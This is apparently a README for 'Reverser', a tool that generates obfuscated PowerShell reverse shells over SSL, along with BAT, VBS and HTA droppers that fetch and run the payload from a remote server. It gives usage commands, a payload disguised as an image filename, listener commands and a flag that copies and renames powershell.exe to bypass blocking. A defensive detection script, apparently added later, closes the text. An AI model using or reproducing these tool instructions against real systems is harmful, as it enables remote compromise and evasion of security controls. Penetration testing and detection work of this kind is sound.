Reverse is a Python-based tool designed to generate obfuscated PowerShell scripts or batch files for establishing a reverse shell with SSL encryption. This tool can help in penetration testing scenarios where the goal is to bypass security mechanisms and establish a secure connection to a target machine.
- Reverse Shell with SSL Encryption: Generates PowerShell scripts that establish an encrypted reverse shell connection using SSL.
- Obfuscation: Each generated PowerShell script uses randomly selected variable names to avoid signature-based detection by security tools.
- Base64 Encoding: The PowerShell scripts are encoded in Base64 for additional obfuscation.
- Batch File Generation: Create a batch file that downloads and executes the encoded PowerShell script directly from a remote server.
- VBS File Generation: Create a VBS file that downloads and executes the encoded PowerShell script directly from a remote server.
- HTA File Generation: Create an HTA file that downloads and executes the encoded PowerShell script directly from a remote server.
- Customizable: Users can specify the IP address, port, and server URL for downloading the PowerShell script.
- Python 3.x
- OpenSSL (for certificate generation)
Clone the repository:
python3 -m venv Reverser
source Reverser/bin/activate
cd Reverse
git clone https://github.com/ShkudW/Reverser.git
cd Reverser
pip install -r requirements.txt
The tool can generate the following file types, as chosen by the user:
- A single PS1 file with obfuscation and Base64 encoding containing a Reverse shell payload.
- An encoded BAT file that connects to a remote server to download and execute the encoded PS1 file.
- A VBS file that connects to a remote server to download and execute the encoded PS1 file.
- An HTA file that connects to a remote server to download and execute the encoded PS1 file.
The BAT, HTA and VBS files make their initial request to the server, which loads the PS1 into memory, over a channel encrypted with a self-signed certificate. Once the PS1 file is in memory, the BAT and VBS files decode the script and establish an encrypted communication channel for the reverse shell.
This way, we can ensure that the communication is encrypted end-to-end.
Creating only a PS1 file (obfuscated and Base64 encoded):
python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type ps1
Creating a VBS file with the tool and transferring it to the listener's directory:
python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type vbs -server https://<Your_Listener_Server_IP_For_Downloading_PS1>/download/photo/corgi.png.ps1
Creating a BAT file with the tool and transferring it to the listener's directory:
python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type bat -server https://<Your_Listener_Server_IP_For_Downloading_PS1>/download/photo/corgi.png.ps1
Opening the listeners:
Opening a listener with the OpenSSL server to receive the reverse shell connection:
openssl s_server -accept <Your_PORT> -cert reception.pem -key reception.key -quiet
Opening a listener with our server to handle the initial connection, in which the BAT/VBS file downloads the PS1 file:
python3 listener.py -https_port|-http_port <Your_Listener_Server_PORT>
Getting an encrypted reverse shell after downloading the PS1 file into memory over an encrypted connection:
Update to the tool: I added the -lolbas flag. This flag applies only when creating a VBS file. In scenarios where powershell.exe is blocked within the organization, the script creates a VBS file that copies powershell.exe from its original path:
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
to a new location where the user executing the payload has write permissions, under a newly generated file name (a different name is generated each time).
This way, the download of the reverse shell payload in PS1 format runs from the newly created copy of powershell.exe:
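From the defender's side, the copy-and-rename step described above leaves a recognisable trace: the copied binary still carries PowerShell's own version resource, so its OriginalFileName stays "PowerShell.EXE" while its on-disk name and directory do not match. The following is an added example, not part of the Reverser project; it assumes Sysmon Event ID 1 field names (Image, OriginalFileName, ParentImage) and runs over constructed sample events rather than real telemetry.

```python
"""Flag a renamed or relocated copy of powershell.exe in process-creation events.

Added example, not code from the Reverser project. Events are dicts using the
Sysmon Event ID 1 field names Image, OriginalFileName and ParentImage.
"""
import ntpath

# Directories where a legitimate powershell.exe image lives (assumption:
# the default 64-bit and WOW64 locations on a stock Windows install).
KNOWN_DIRS = {
    r"c:\windows\system32\windowspowershell\v1.0",
    r"c:\windows\syswow64\windowspowershell\v1.0",
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

def classify(event):
    """Return the list of indicators this event triggers (empty if benign)."""
    original = event.get("OriginalFileName", "").lower()
    if original != "powershell.exe":
        return []  # PE version info says this binary is not PowerShell
    image = event.get("Image", "")
    name = ntpath.basename(image).lower()
    folder = ntpath.dirname(image).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    reasons = []
    if name != "powershell.exe":
        reasons.append(f"powershell.exe running under the name {name}")
    if folder not in KNOWN_DIRS:
        reasons.append(f"powershell.exe running from unexpected directory {folder}")
    if parent in SCRIPT_HOSTS:  # VBS/HTA droppers launch it from a script host
        reasons.append(f"launched by script host {parent}")
    return reasons

def scan(events):
    """Return (index, reasons) for every event that triggers at least one indicator."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\svc_7f3a.exe",
     "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, "; ".join(reasons))
```

Only the second sample event is flagged, on all three indicators; the stock powershell.exe launched from explorer.exe produces no alert.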